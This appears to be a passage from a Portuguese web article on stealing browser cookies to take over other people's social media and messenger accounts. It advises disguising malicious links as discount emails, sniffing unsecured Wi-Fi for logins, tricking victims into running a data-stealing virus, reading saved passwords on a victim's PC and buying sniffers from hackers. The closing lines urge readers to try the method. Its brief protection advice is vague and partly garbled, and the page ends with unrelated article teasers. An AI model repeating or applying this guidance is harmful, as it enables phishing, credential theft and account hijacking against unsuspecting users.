
A tarefa não é fácil, pois muitas vezes para ativar o código é necessário clicar no link com ele. Você pode disfarçar o link e enviá-lo por e-mail junto com uma oferta interessante. Por exemplo, ofereça um grande desconto em uma loja online. Você também pode implementar tudo isso na imagem. O usuário provavelmente irá visualizá-lo e não suspeitará de nada.

Instalando um farejador

Esta é uma implementação programas especializados para monitorar o tráfego no dispositivo de outra pessoa. O sniffer permite interceptar sessões transmitidas com dados de outras pessoas. Desta forma você pode obter todos os logins e senhas, endereços, qualquer informação importante transmitido pela rede pelo usuário. Nesse caso, os ataques são mais frequentemente realizados em dados HTTP desprotegidos. O wi-fi inseguro funciona bem para isso.

Existem várias maneiras de implementar um sniffer:

  • Copiar tráfego;
  • Análise de dados utilizando ataques de tráfego;
  • Ouvindo interfaces;
  • Inserindo um sniffer em uma quebra de canal.
Substituição de cookies

Todos os dados são armazenados no servidor web em sua forma original. Se você alterá-los, isso será considerado uma substituição. Todos os materiais recebidos podem ser utilizados em outro computador. Desta forma você terá acesso total aos dados pessoais do usuário. Você pode modificar os cookies usando as configurações do navegador, complementos ou programas especiais. A edição também é possível em qualquer bloco de notas padrão de um PC.

Roubando cookies usando um vírus

Os especialistas aconselham não usar cookies, a menos que haja uma necessidade especial. Se for possível desativá-los, é melhor fazê-lo. Isso ocorre porque os cookies são muito vulneráveis. Muitas vezes são roubados por criminosos. Uma grande quantidade de informações pessoais pode ser obtida desses arquivos. informação confidencial, que será usado contra uma pessoa. Os tipos de arquivos mais perigosos são aqueles que permanecem no sistema após o término da sessão.

Os cookies são frequentemente roubados usando um utilitário de vírus. Isso é feito de forma bastante simples. Qualquer utilitário seguro contém um vírus que coleta determinados materiais no computador. O programa de vírus será conectado ao servidor de seu proprietário. O programa deve ser configurado para que o navegador o utilize como servidor proxy.

Quando o programa chegar ao PC da vítima, ele começará automaticamente a coletar todos os dados armazenados e a enviá-los para você.

Os vírus são diferentes, suas funções também podem ser diferentes. Alguns permitem que você controle completamente o navegador e visualize qualquer informação. Outros são capazes de roubar materiais protegidos. Outros ainda coletam apenas dados não seguros.

Você pode ter dificuldade em introduzir um programa antivírus no computador de outra pessoa. É necessário forçar o usuário a baixá-lo e executá-lo. Aqui você pode enviar a ele uma carta com um link para o programa ou passar o programa como seguro e esperar que a pessoa faça o download do seu site.

Como proteger os cookies contra roubo?

A maioria dos recursos da web não está suficientemente protegida. Os hackers encontram facilmente vulnerabilidades e bugs nessas plataformas.

Regras de proteção de cookies:

  1. Vincule o ID do computador à sessão atual. Então, ao fazer login no site a partir de um dispositivo de terceiros, uma nova sessão será iniciada e os dados da anterior não serão recuperados.
  2. Vincule a sessão ao navegador. O mesmo princípio funcionará como no parágrafo anterior.
  3. Criptografe os parâmetros enviados pela rede. Então as informações armazenadas no documento não serão compreensíveis. Será inútil para quem o interceptou. Esta técnica não irá protegê-lo 100%; alguns especialistas podem descriptografar qualquer material.
  4. Crie uma pasta separada para identificadores.

Como descobrir a senha da conta de outra pessoa por meio de cookies?

Para obter os dados de login de outra pessoa, você deve primeiro acessar o arquivo no qual eles foram salvos.

Para quem usa Mozilla Firefox você precisa ir até a aba de ferramentas, localizada no menu principal. A seguir nas configurações do sistema você encontrará a seção “Proteção”, onde deverá procurar todas as informações importantes sobre contas nas redes sociais. Todas as senhas estão ocultas, então clique no botão “exibir”. Você pode instalar proteção imediatamente e definir um código especial. Então ninguém, exceto você, receberá esta informação.

No Opera, apenas nomes de usuário estão disponíveis para visualização pública. Mas no menu você encontra um gerenciador de senhas e visualiza tudo o que está armazenado no seu computador. Lista completa está no gerenciador. Para obter acesso às senhas, você precisa instalar uma extensão adicional.

EM Google Chrome Todos esses materiais podem ser vistos nas configurações avançadas. Existe uma aba com todos os cookies salvos.

Infelizmente, navegador padrão Internet Explorer não possui tais funções. Para saber informações sobre as plataformas web que o proprietário do PC visita, é necessário baixar um programa especial. Você pode encontrá-lo gratuitamente na Internet, é totalmente seguro, mas é melhor baixá-lo de fontes confiáveis. Não esqueça que qualquer programa deve ser verificado por um antivírus. Isto é especialmente verdadeiro para os utilitários que funcionam com senhas.

Esta técnica só é indicada para quem tem acesso físico ao computador da vítima. Você também pode descobrir a senha de outra pessoa se a pessoa fez login na plataforma pelo seu PC e salvou seus dados.

Programas para roubar cookies

Existem muitos fóruns de hackers na Internet onde os hackers se comunicam entre si. As pessoas vão para lá na esperança de obter ajuda gratuita. É lá que você pode encontrar um grande número de programas diferentes para hackear. Queremos avisá-lo que você não deve confiar nesses programas. Os utilitários para roubar cookies remotamente do dispositivo de outra pessoa são programas fictícios ou antivírus. Se você baixar este software para o seu PC, provavelmente cairá na armadilha de um golpista. Os golpistas publicam programas gratuitamente. Assim, eles distribuem software antivírus e ganham controle sobre os PCs de outras pessoas. Em geral, esses programas são uma farsa, você entenderá isso pela interface e pelo conteúdo. Se você for usar algum software para extrair arquivos, que sejam farejadores. Claro, usá-los não é tão fácil. E encontrar um bom farejador na Internet não é fácil. Mas esse software está disponível em especialistas que podem vendê-lo por dinheiro. Lembre-se de que existem muitos golpistas, cada um com seus truques. Você só deve confiar em hackers confiáveis ​​que tenham boa reputação, tenham avaliações e tenham seu próprio site.

Para concluir, gostaria de salientar que roubar cookies é um método verdadeiramente poderoso e cuja eficácia é muito elevada. Se você deseja hackear o perfil de alguém em uma rede social ou mensageiro instantâneo, considere esta opção. Este método funciona melhor quando você pode usar o computador da vítima. É muito mais difícil conseguir materiais à distância, mas você pode usar nossas dicas e tentar colocar esse método em prática.

No capítulo



 


Ler:



Conectando um smartphone Android a um PC via Wi-Fi Conectando um telefone a um PC via Wi-Fi

Conectando um smartphone Android a um PC via Wi-Fi Conectando um telefone a um PC via Wi-Fi

Como conectar um tablet ou telefone Android a um computador sem fio. Como transferir arquivos e assistir vídeos de um PC. Sobre as complexidades da sincronização de dados...

True RMS é a única medição correta

True RMS é a única medição correta

Introdução Medir trueRMS de tensão alternada não é uma tarefa totalmente simples, nem é o que parece à primeira vista. Em primeiro lugar porque...

Amostras de engenharia Skylake (LGA1151) - Zionoviki

Amostras de engenharia Skylake (LGA1151) - Zionoviki

O progresso que os processadores Intel sofrem ao mudar gerações de microarquitetura desacelerou visivelmente recentemente. Na verdade, se...

Por que os cabos magnéticos para smartphones são perigosos e úteis

Por que os cabos magnéticos para smartphones são perigosos e úteis

O cabo magnético de náilon Mantis USB para USB Tipo C é um acessório prático e moderno projetado para conectar seu smartphone a um carregador...

imagem de feed RSS